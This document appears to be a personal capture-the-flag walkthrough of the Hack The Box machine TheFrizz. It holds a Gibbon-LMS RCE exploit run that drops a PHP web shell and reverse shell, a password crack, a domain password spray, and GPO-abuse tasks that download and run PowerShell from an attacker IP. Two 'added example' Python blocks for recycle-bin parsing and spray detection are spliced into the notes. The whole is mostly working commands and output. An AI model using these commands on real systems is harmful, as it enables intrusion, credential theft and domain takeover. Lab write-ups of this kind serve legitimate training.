Here are my notes on the THEFRIZZ box from Hack The Box.
THEFRIZZ: 10.129.99.125
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
ssh -K f.frizzle@10.129.99.125
f.frizzle@10.129.99.125: Permission denied (gssapi-with-mic,keyboard-interactive).
#WASTE OF TIME, DON'T BOTHER !
#WILL CONSIDER IT.
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
frizzdc.frizz.htb
dirsearch -u http://frizzdc.frizz.htb/
/home:
There is a base64 string on the main page of /home:
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ/10.129.99.125]
└─# cat text.txt
V2FudCB0byBsZWFybiBoYWNraW5n
IGJ1dCBkb24ndCB3YW50IHRvIGdv
IHRvIGphaWw/IFlvdSdsbCBsZWFy
biB0aGUgaW4ncyBhbmQgb3V0cyBv
ZiBTeXNjYWxscyBhbmQgWFNTIGZy
b20gdGhlIHNhZmV0eSBvZiBpbnRl
cm5hdGlvbmFsIHdhdGVycyBhbmQg
aXJvbiBjbGFkIGNvbnRyYWN0cyBm
cm9tIHlvdXIgY3VzdG9tZXJzLCBy
ZXZpZXdlZCBieSBXYWxrZXJ2aWxs
ZSdzIGZpbmVzdCBhdHRvcm5leXMu
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ/10.129.99.125]
└─# cat text.txt | base64 -d
Want to learn hacking but don't want to go to jail? You'll learn the in's and outs of Syscalls and XSS from the safety of international waters and iron clad contracts from your customers, reviewed by Walkerville's finest attorneys.base64: invalid input
Clicking the blue Staff Login button leads to the Gibbon-LMS page.
/Gibbon-LMS:
No admin:admin = NOPE !
No default creds such as admin:gibbon or admin:password = NOPE !
https://github.com/Zer0F8th/CVE-2023-34598 - Vulnerable to LFI EXPLOIT !
Gibbon v25.0.00
python3 CVE-2023-34598.py scan http://frizzdc.frizz.htb/Gibbon-LMS/
[*] Scanning URL: http://frizzdc.frizz.htb/Gibbon-LMS
[+] Target appears vulnerable. Saving dump...
[+] Database dump saved to 'Gibbon_dump-2/gibbon.sql'.
https://github.com/maddsec/CVE-2023-34598
http://frizzdc.frizz.htb/Gibbon-LMS/?q=gibbon.sql - WORKS !
LFI EXPLOIT !
#NO stealing responder attack.
ffuf -u http://frizzdc.frizz.htb/Gibbon-LMS/?q=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
It seems I can only access files within the Gibbon-LMS directory:
https://github.com/GibbonEdu/core
LFI is a rabbit hole, use a different exploit.
It's vulnerable to CVE-2023-45878 !
https://github.com/dgoorden/CVE-2023-45878
-RCE EXPLOIT !
┌──(root㉿kali)-[/home/…/BOXES/THEFRIZZ/10.129.99.125/CVE-2023-45878]
└─# python3 CVE-2023-45878.py
usage: CVE-2023-45878.py [-h] -l LHOST -p LPORT -u URL [-f FILENAME]
CVE-2023-45878.py: error: the following arguments are required: -l/--lhost, -p/--lport, -u/--url
┌──(root㉿kali)-[/home/…/BOXES/THEFRIZZ/10.129.99.125/CVE-2023-45878]
└─# python3 CVE-2023-45878.py -u http://frizzdc.frizz.htb/Gibbon-LMS -l 10.10.14.93 -p 1234 -f shell
[!] Exploit written for CVE-2023-45878, Gibbon LMS 25.0.1
[+] Exploit Sent to: http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php
[+] Reverse Shell Target: 10.10.14.93:1234
[!] Make sure you have a listener running: nc -lvnp 1234
[+] HTTP Response Code: 200
[+] PHP Web Shell Uploaded Successfully!
[+] Attempting to trigger reverse shell...
[+] Payload delivered. Check your listener.
[!] If no connection, verify manually: http://frizzdc.frizz.htb/Gibbon-LMS/shell.php?cmd=whoami
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.99.125] 52516
SHELL> whoami
frizz\w.webservice
SHELL> hostname
frizzdc
USER-SHELL !
Persist it with a Metasploit Meterpreter session as usual.
C:\Users = access-denied.
PRIV ESC:
w.webservice -> f.frizzle:
Rubeus.exe:
No Kerberoasting or AS-REP roasting = DON'T BOTHER !
netstat -ap tcp
TCP 0.0.0.0:3306 frizzdc:0 LISTENING
MySQL service for the gibbon database?
#There is config.php in C:\xampp\htdocs\Gibbon-LMS.
C:\xampp\htdocs\Gibbon-LMS>type config.php
type config.php
[SNIP]
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
/**
* Sets a globally unique id, to allow multiple installs on a single server.
*/
$guid = '7y59n5xz-uym-ei9p-7mmq-83vifmtyey2';
/**
* Sets system-wide caching factor, used to balance performance and freshness.
* Value represents number of page loads between cache refresh.
* Must be positive integer. 1 means no caching.
*/
$caching = 10;
C:\xampp\htdocs\Gibbon-LMS>net user /domain
net user /domain
User accounts for \\FRIZZDC
-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice
Is the password reused for any of these users?
a.perlstein
Administrator
c.ramon
c.sandiego
d.hudson
f.frizzle
g.frizzle
Guest
h.arm
J.perlstein
k.franklin
krbtgt
l.awesome
m.ramon
M.SchoolBus
p.terese
r.tennelli
t.wright
v.frizzle
w.li
w.Webservice
#NOPE, the password is not reused for any of these users.
./chisel server -p 8000 --reverse
chisel.exe client 10.10.14.93:8000 R:3306:localhost:3306
mysql -u MrGibbonsDB -p -h 127.0.0.1
MisterGibbs!Parrot!?1
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ/10.129.99.125]
└─# mysql -u MrGibbonsDB -p -h 127.0.0.1
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1093
Server version: 10.4.32-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
use gibbon;
select * from gibbonPerson;
Gibbon-LMS Database User Hash-Cracking:
f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
/aACFhikmNopqrRTVz2489 = 22
AbDfFgGiKlorRtTUy34579 = 22
https://github.com/Profzzor/gibbon-cracker
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ/gibbon-cracker]
└─# python3 gibbon_cracker.py -w '/usr/share/wordlists/rockyou.txt' -s '/aACFhikmNopqrRTVz2489' -H '067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03'
[+] Password found: Jenni_Luvs_Magic23
f.frizzle:Jenni_Luvs_Magic23
$SecPassword = ConvertTo-SecureString 'Jenni_Luvs_Magic23' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('frizz.htb\f.frizzle', $SecPassword)
$session = New-PSSession -ComputerName FRIZZDC.FRIZZ.HTB -Credential $Cred
Invoke-Command -Session $session -ScriptBlock {whoami}
#NOPE, DOESN'T WORK, but we can log in to the Gibbon-LMS website as f.frizzle.
Gibbon-LMS as f.frizzle:
Invoke-Command -Session $session -ScriptBlock {Start-Process cmd}
#NOPE
As I suspected, Kerberos authentication only.
10.129.154.9 frizzdc.frizz.htb frizz.htb frizzdc
crackmapexec smb 10.129.99.125 -d frizz.htb -u users.txt -p Jenni_Luvs_Magic23 -k
[SNIP]
SMB 10.129.99.125 445 10.129.99.125 [-] frizz.htb\f.frizzle: KDC_ERR_S_PRINCIPAL_UNKNOWN
[SNIP]
nxc smb frizzdc.frizz.htb -k -u f.frizzle -p 'Jenni_Luvs_Magic23'
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
SSH with Kerberos Authentication:
https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/
getTGT.py frizz.htb/f.frizzle -dc-ip 10.129.154.9 -hashes :96198B704E6586B657FD425C7BAAF105
nxc smb frizzdc.frizz.htb -k -u f.frizzle -H '96198B704E6586B657FD425C7BAAF105'
ntpdate 10.129.154.9
ticketConverter.py f.frizzle.ccache f.frizzle.kirbi
export KRB5CCNAME=/home/kali/BOXES/f.frizzle.ccache
export KRB5CCNAME=/home/kali/BOXES/f.frizzle.kirbi
ssh -o GSSAPIAuthentication=yes -o GSSAPIDelegateCredentials=yes f.frizzle@10.129.154.9
python3 psexec.py kinetic/kram@polar -k -no-pass
Works (the consistent way):
faketime -f $(ntpdate -q frizzdc.frizz.htb | awk '{print $4}') bash
getTGT.py frizz.htb/f.frizzle -dc-ip 10.129.154.9 -hashes :96198B704E6586B657FD425C7BAAF105
export KRB5CCNAME=/home/kali/BOXES/f.frizzle.ccache
klist
ssh -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb -vv
[SNIP]
Cannot find KDC for realm "FRIZZ.HTB"
[SNIP]
Time to edit /etc/krb5.conf:
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_kdc = false
dns_lookup_realm = false
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
#Use DeepSeek AI.
┌──(root㉿kali)-[/home/kali/BOXES]
└─# klist
Ticket cache: FILE:/home/kali/BOXES/f.frizzle.ccache
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/27/2025 22:15:50 03/28/2025 08:15:50 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/28/2025 22:15:50
03/27/2025 22:24:58 03/28/2025 08:15:50 host/frizzdc.frizz.htb@FRIZZ.HTB
renew until 03/28/2025 22:15:50
┌──(root㉿kali)-[/home/kali/BOXES]
└─# ssh -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb -vv
ssh -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb
PS C:\Users\f.frizzle> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle> hostname
frizzdc
PS C:\Users\f.frizzle> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::4589:f1db:f272:6792
Link-local IPv6 Address . . . . . : fe80::7357:40a2:9226:e09e%5
IPv4 Address. . . . . . . . . . . : 10.129.154.9
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%5
10.129.0.1
F.FRIZZLE-SHELL !
PS C:\Users\f.frizzle\Desktop> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle\Desktop> hostname
frizzdc
PS C:\Users\f.frizzle\Desktop> dir
Directory: C:\Users\f.frizzle\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 3/27/2025 2:40 PM 34 user.txt
PS C:\Users\f.frizzle\Desktop> type user.txt
43df7953ad[REDIRECTED]
USER.TXT: 43df7953ad[REDIRECTED]
f.frizzle -> M.SchoolBus
scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:C:/Users/f.frizzle/BloodHound.zip .
Nothing interesting in whoami /priv or whoami /groups.
No interesting vulnerable programs (Program Files and Program Files (x86)).
Nothing interesting in inetpub.
$RECYCLE.BIN PRIV ESC NOTES:
#Always consider checking the $RECYCLE.BIN folder: cd C:\`$RECYCLE.BIN
PS C:\> ls -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM $RECYCLE.BIN
d--h- 3/10/2025 3:31 PM $WinREAgent
d--hs 2/20/2025 2:51 PM Config.Msi
l--hs 10/29/2024 9:12 AM Documents and Settings -> C:\Users
d---- 3/10/2025 3:39 PM inetpub
d---- 5/8/2021 1:15 AM PerfLogs
d-r-- 2/26/2025 8:13 AM Program Files
d---- 5/8/2021 2:34 AM Program Files (x86)
d--h- 2/20/2025 2:50 PM ProgramData
d--hs 10/29/2024 9:12 AM Recovery
d--hs 10/29/2024 7:25 AM System Volume Information
d-r-- 10/29/2024 7:31 AM Users
d---- 3/10/2025 3:41 PM Windows
d---- 10/29/2024 7:28 AM xampp
-a-hs 10/29/2024 8:27 AM 12288 DumpStack.log.tmp
PS C:\> cd $RECYCLE.BIN
PS C:\Users\f.frizzle> cd C:\`$RECYCLE.BIN
PS C:\$RECYCLE.BIN> ls -Force
Directory: C:\$RECYCLE.BIN
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs 10/29/2024 7:31 AM S-1-5-21-2386970044-1145388522-2932701813-1103
cd C:\`$RECYCLE.BIN = The Correct one.
PS C:\$RECYCLE.BIN> cd S-1-5-21-2386970044-1145388522-2932701813-1103
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> dir
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
mkdir C:\Temp\Recovered
cp `$IE2XMEG.7z C:\Temp\Recovered\
cp `$RE2XMEG.7z C:\Temp\Recovered\
scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:C:/Temp/Recovered/'$IE2XMEG.7z' .
scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:C:/Temp/Recovered/'$RE2XMEG.7z' .
┌──(root㉿kali)-[/home/kali/BOXES]
└─# scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:C:/Temp/Recovered/'$IE2XMEG.7z' .
$IE2XMEG.7z 100% 148 1.4KB/s 00:00
┌──(root㉿kali)-[/home/kali/BOXES]
└─# scp -o GSSAPIAuthentication=yes f.frizzle@frizzdc.frizz.htb:C:/Temp/Recovered/'$RE2XMEG.7z' .
$RE2XMEG.7z 100% 29MB 1.6MB/s 00:17
┌──(root㉿kali)-[/home/kali/BOXES]
└─# ls
'$IE2XMEG.7z' '$RE2XMEG.7z' BloodHound.zip f.frizzle.ccache f.frizzle.kirbi
┌──(root㉿kali)-[/home/kali/BOXES]
└─# cp '$IE2XMEG.7z' IE2XMEG.7z
┌──(root㉿kali)-[/home/kali/BOXES]
└─# cp '$RE2XMEG.7z' RE2XMEG.7z
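Added example, not part of the original notes: the 148-byte $IE2XMEG.7z is the recycle-bin index record that stores the original path, size and deletion time of $RE2XMEG.7z, so parsing it tells you what the archive was before deletion without touching the 29 MB of data. The record below is constructed with a placeholder path (the real one is not in the notes); the parser handles both the fixed-size v1 layout and the v2 layout Windows 10+ writes.

```python
import struct
from datetime import datetime, timedelta, timezone

_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_iso(filetime):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an ISO-8601 string."""
    return (_EPOCH_1601 + timedelta(microseconds=filetime // 10)).isoformat()


def parse_recycle_bin_index(data):
    """Parse a $I<id> record from C:\\$RECYCLE.BIN\\<SID>\\.

    Version 1 (Vista to 8.1): 24-byte header then a fixed 520-byte UTF-16LE path (544 bytes).
    Version 2 (Windows 10+): 24-byte header, 4-byte path length in UTF-16 characters
    (including the NUL terminator), then the path. The matching $R<id> file holds the data.
    """
    if len(data) < 24:
        raise ValueError("record too short for a $I header")
    version, original_size, filetime = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        if len(data) != 544:
            raise ValueError(f"v1 record must be 544 bytes, got {len(data)}")
        raw_path = data[24:544]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)
        if len(data) != 28 + nchars * 2:
            raise ValueError(f"v2 record length mismatch: {len(data)} bytes for {nchars} chars")
        raw_path = data[28:]
    else:
        raise ValueError(f"unknown $I version {version}")
    return {
        "version": version,
        "original_size": original_size,
        "deleted_at": filetime_to_iso(filetime),
        "original_path": raw_path.decode("utf-16-le").split("\x00", 1)[0],
    }


def r_file_for(i_name):
    """$IE2XMEG.7z describes the data file $RE2XMEG.7z: same id, $I swapped for $R."""
    if not i_name.startswith("$I"):
        raise ValueError("not a $I index name")
    return "$R" + i_name[2:]


def build_v2_record(path, size, deleted_at):
    """Builds a constructed v2 record so the parser can be exercised offline."""
    delta = deleted_at - _EPOCH_1601
    filetime = (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10
    encoded = (path + "\x00").encode("utf-16-le")
    return struct.pack("<QQQI", 2, size, filetime, len(path) + 1) + encoded


# Constructed sample: the path is a placeholder (the real one is not in the notes);
# the size matches $RE2XMEG.7z above, and the 59-character path yields a 148-byte
# record, the same size the listing shows for $IE2XMEG.7z.
SAMPLE_I_RECORD = build_v2_record(
    r"C:\Users\f.frizzle\Documents\EXAMPLE_PLACEHOLDER_ARCHIVE.7z",
    30416987,
    datetime(2024, 10, 29, 7, 31, tzinfo=timezone.utc),
)
```

Run `parse_recycle_bin_index(open("IE2XMEG.7z", "rb").read())` on the copied index file to get the real path of the deleted archive.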
RE2XMEG.7z is the one, but it's finding a needle in a haystack all over again.
RE2XMEG.7z:
┌──(root㉿kali)-[/home/kali/BOXES/7z/RE]
└─# grep -rPio 'pass(word|wd|phrase)?[=:][\s]?[A-Za-z0-9+/]{20,}={0,2}' /home/kali/BOXES/7z/RE 2>/dev/null | while read -r line; do
encoded=$(echo "$line" | grep -Po '[A-Za-z0-9+/]{20,}={0,2}$')
echo -n "Found: $line -> Decoded: "
echo "$encoded" | base64 -d 2>/dev/null
echo
done
Found: /home/kali/BOXES/7z/RE/wapt-get.ini.tmpl:password=5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 -> Decoded: <|uӎWt{:~馛mz٭uyyg|
#NOPE, not the right one.
grep -rPio 'pass(word|wd|phrase)?[=:]' /home/kali/BOXES/7z/RE 2>/dev/null | while read -r line; do
encoded=$(echo "$line" | grep -Po '[A-Za-z0-9+/]{20,}={0,2}$')
echo -n "Found: $line -> Decoded: "
echo "$encoded" | base64 -d 2>/dev/null
echo
done
#IT DIDN'T WORK.
After a couple of hours of enumeration, I found waptserver.ini:
If there are so many files to enumerate that it feels like finding a needle in a haystack, look at the .ini files first, because they usually contain very interesting values.
┌──(root㉿kali)-[/home/kali/BOXES/7z/RE]
└─# cat waptserver.ini
[options]
allow_unauthenticated_registration = True
wads_enable = True
login_on_wads = True
waptwua_enable = True
secret_key = ylPYfn9tTU9IDu9yssP2luKhjQijHKvtuxIzX9aWhPyYKtRO7tMSq5sEurdTwADJ
server_uuid = 646d0847-f8b8-41c3-95bc-51873ec9ae38
token_secret_key = 5jEKVoXmYLSpi5F7plGPB4zII5fpx0cYhGKX5QC0f7dkYpYmkeTXiFlhEJtZwuwD
wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
clients_signing_key = C:\wapt\conf\ca-192.168.120.158.pem
clients_signing_certificate = C:\wapt\conf\ca-192.168.120.158.crt
[tftpserver]
root_dir = c:\wapt\waptserver\repository\wads\pxe
log_path = c:\wapt\log
┌──(root㉿kali)-[/home/kali/BOXES/7z/RE]
└─# echo "IXN1QmNpZ0BNZWhUZWQhUgo=" | base64 -d
!suBcig@MehTed!R
┌──(root㉿kali)-[/home/kali/BOXES/7z]
└─# nxc smb frizzdc.frizz.htb -k -u users.txt -p '!suBcig@MehTed!R'
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\a.perlstein:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\c.ramon:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\c.sandiego:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\d.hudson:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\g.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\Guest:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\J.perlstein:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\k.franklin:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\krbtgt:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\l.awesome:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\m.ramon:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
frizz.htb\M.SchoolBus:!suBcig@MehTed!R
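Defender's view of the spray above, as an added example that is not from the original notes: each KDC_ERR_PREAUTH_FAILED / KDC_ERR_CLIENT_REVOKED line nxc printed is mirrored on the DC by an Event ID 4771 pre-authentication failure for that account from one client address. The log rows below are constructed sample data, and the threshold and window are assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Kerberos failure codes as logged in Event ID 4771, the same errors nxc printed above.
KRB_FAILURE_CODES = {
    "0x18": "KDC_ERR_PREAUTH_FAILED",  # wrong password for an existing account
    "0x12": "KDC_ERR_CLIENT_REVOKED",  # disabled or locked-out account (Guest, krbtgt)
}

# Constructed sample of DC security-log rows (not real logs from the box):
# "time,event_id,target_user,client_ip,failure_code". The burst from one client
# mirrors the spray above; the two t.wright rows are ordinary mistyped-password noise.
SAMPLE_EVENTS = """\
2025-03-27T22:30:01Z,4771,a.perlstein,10.10.14.74,0x18
2025-03-27T22:30:01Z,4771,Administrator,10.10.14.74,0x18
2025-03-27T22:30:01Z,4771,c.ramon,10.10.14.74,0x18
2025-03-27T22:30:02Z,4771,c.sandiego,10.10.14.74,0x18
2025-03-27T22:30:02Z,4771,d.hudson,10.10.14.74,0x18
2025-03-27T22:30:02Z,4771,f.frizzle,10.10.14.74,0x18
2025-03-27T22:30:02Z,4771,g.frizzle,10.10.14.74,0x18
2025-03-27T22:30:03Z,4771,Guest,10.10.14.74,0x12
2025-03-27T22:30:03Z,4771,h.arm,10.10.14.74,0x18
2025-03-27T22:30:03Z,4771,J.perlstein,10.10.14.74,0x18
2025-03-27T22:30:03Z,4771,k.franklin,10.10.14.74,0x18
2025-03-27T22:30:03Z,4771,krbtgt,10.10.14.74,0x12
2025-03-27T22:30:04Z,4771,l.awesome,10.10.14.74,0x18
2025-03-27T22:30:04Z,4771,m.ramon,10.10.14.74,0x18
2025-03-27T22:30:04Z,4768,M.SchoolBus,10.10.14.74,0x0
2025-03-27T22:10:15Z,4771,t.wright,10.129.0.55,0x18
2025-03-27T22:10:40Z,4771,t.wright,10.129.0.55,0x18
"""


def parse_events(text):
    """Keep only 4771 (pre-authentication failed) rows from the export above."""
    events = []
    for line in text.strip().splitlines():
        ts, event_id, user, ip, code = line.split(",")
        if event_id == "4771":
            events.append({"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                           "user": user.lower(),  # AD names are case-insensitive
                           "ip": ip, "code": code})
    return events


def detect_spray(events, min_accounts=5, window_seconds=60):
    """Flag a client address that fails pre-auth for >= min_accounts distinct
    accounts inside one sliding window. A single account failing repeatedly
    (a user mistyping a password) never trips this, so that noise is ignored."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        start = 0
        for end, e in enumerate(evs):
            while e["time"] - evs[start]["time"] > timedelta(seconds=window_seconds):
                start += 1
            if len({x["user"] for x in evs[start:end + 1]}) >= min_accounts:
                alerts.append({
                    "ip": ip,
                    "distinct_accounts": len({x["user"] for x in evs}),
                    "codes": dict(Counter(KRB_FAILURE_CODES.get(x["code"], x["code"]) for x in evs)),
                    "first_seen": evs[0]["time"].isoformat(),
                    "last_seen": evs[-1]["time"].isoformat(),
                })
                break  # one alert per source address; the summary covers all its failures
    return alerts
```

The 4768 success for M.SchoolBus from the same address right after the burst is the follow-up an analyst would pivot on once the alert fires.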
M.SchoolBus is a member of Desktop Admins and Remote Management Users.
As usual, overpass-the-hash and Kerberos authentication to the SSH service.
getTGT.py frizz.htb/M.SchoolBus -dc-ip 10.129.154.9 -hashes :C5127655F826FD8FBF09B90AE0795906
export KRB5CCNAME=/home/kali/BOXES/M.SchoolBus.ccache
klist
ssh -o GSSAPIAuthentication=yes M.SchoolBus@frizzdc.frizz.htb
M.SchoolBus SHELL !
M.SchoolBus -> Administrator:
M.SchoolBus -> member of Desktop Admins -> member of the GROUP POLICY CREATOR OWNERS group.
M.SchoolBus can create a GPO, and we can take advantage of that to get an administrator shell.
GPO Abuse – Edit permissions misconfiguration
New-GPO -Name 'Exploit'
PS C:\Users\M.SchoolBus> New-GPO -Name 'Exploit'
DisplayName : Exploit
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 0497b08b-6dea-42fc-a3ba-7c482bf26ae6
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 3/27/2025 5:47:28 PM
ModificationTime : 3/27/2025 5:47:28 PM
UserVersion :
ComputerVersion :
WmiFilter :
New-GPLink -Name "Exploit" -Target "OU=CLASS_FRIZZ,DC=FRIZZ,DC=HTB"
New-GPOImmediateTask -TaskName Debugging -GPODisplayName Exploit -CommandArguments 'powershell -e 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' -Force
gpupdate
SharpGPOAbuse.exe NOTES: #THEFRIZZ
PS C:\Users\M.SchoolBus> Get-DomainPolicy
SystemAccess : @{LSAAnonymousNameLookup=0; MaximumPasswordAge=-1; ClearTextPassword=0; PasswordComplexity=1; RequireLogonToChangePassword=0; MinimumPasswordAge=0; ForceLogoffWhenHourExpire=0; LockoutBadCount=0; MinimumPasswordLength=0; PasswordHistorySize=0}
KerberosPolicy : @{TicketValidateClient=1; MaxServiceAge=600; MaxRenewAge=7; MaxClockSkew=5; MaxTicketAge=10}
Unicode : @{Unicode=yes}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.String[]}
Version : @{Revision=1; signature="$CHICAGO$"}
PS C:\Users\M.SchoolBus> Get-NetOU
LDAP://OU=Domain Controllers,DC=frizz,DC=htb
LDAP://OU=Class_Frizz,DC=frizz,DC=htb
New-GPO -Name 'CMD'
New-GPLink -Name "CMD" -Target "OU=Domain Controllers,DC=FRIZZ,DC=HTB"
./SharpGPOAbuse.exe --AddComputerTask --TaskName "Task1" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c powershell -Sta -Nop -Window Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://10.10.14.74/')" --GPOName "CMD"
New-GPO -Name 'REV'
New-GPLink -Name "REV" -Target "OU=Domain Controllers,DC=FRIZZ,DC=HTB"
./SharpGPOAbuse.exe --AddComputerTask --TaskName "Task1" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c powershell -e 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 " --GPOName "REV"
New-GPO -Name 'Exploit'
New-GPLink -Name "Exploit" -Target "OU=CLASS_FRIZZ,DC=FRIZZ,DC=HTB"
./SharpGPOAbuse.exe --AddComputerTask --TaskName "Task1" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c powershell -Sta -Nop -Window Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://10.10.14.74/')" --GPOName "Exploit"
./SharpGPOAbuse.exe --AddComputerTask --TaskName "Task1" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c powershell -Sta -Nop -Window Hidden -Command iex (New-Object Net.WebClient).DownloadString('http://10.10.14.74/')" --GPOName "Exploit2"
gpupdate
gpupdate /force
https://sc.vern.cc/@eggsec6/htb-thefrizz-kerberos-gpo-abuse-and-privilege-escalation-and-cve-2023-45878-d666197eb911
GPO Abuse – Edit permissions misconfiguration
python3 pygpoabuse.py 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R' -gpo-id "0497b08b-6dea-42fc-a3ba-7c482bf26ae6"
GPOABUSE WINDOWS:
New-GPO -Name 'CMD'
New-GPLink -Name "CMD" -Target "OU=Domain Controllers,DC=FRIZZ,DC=HTB"
New-GPOImmediateTask -TaskName Debugging -GPODisplayName Reverse -CommandArguments '' -Force
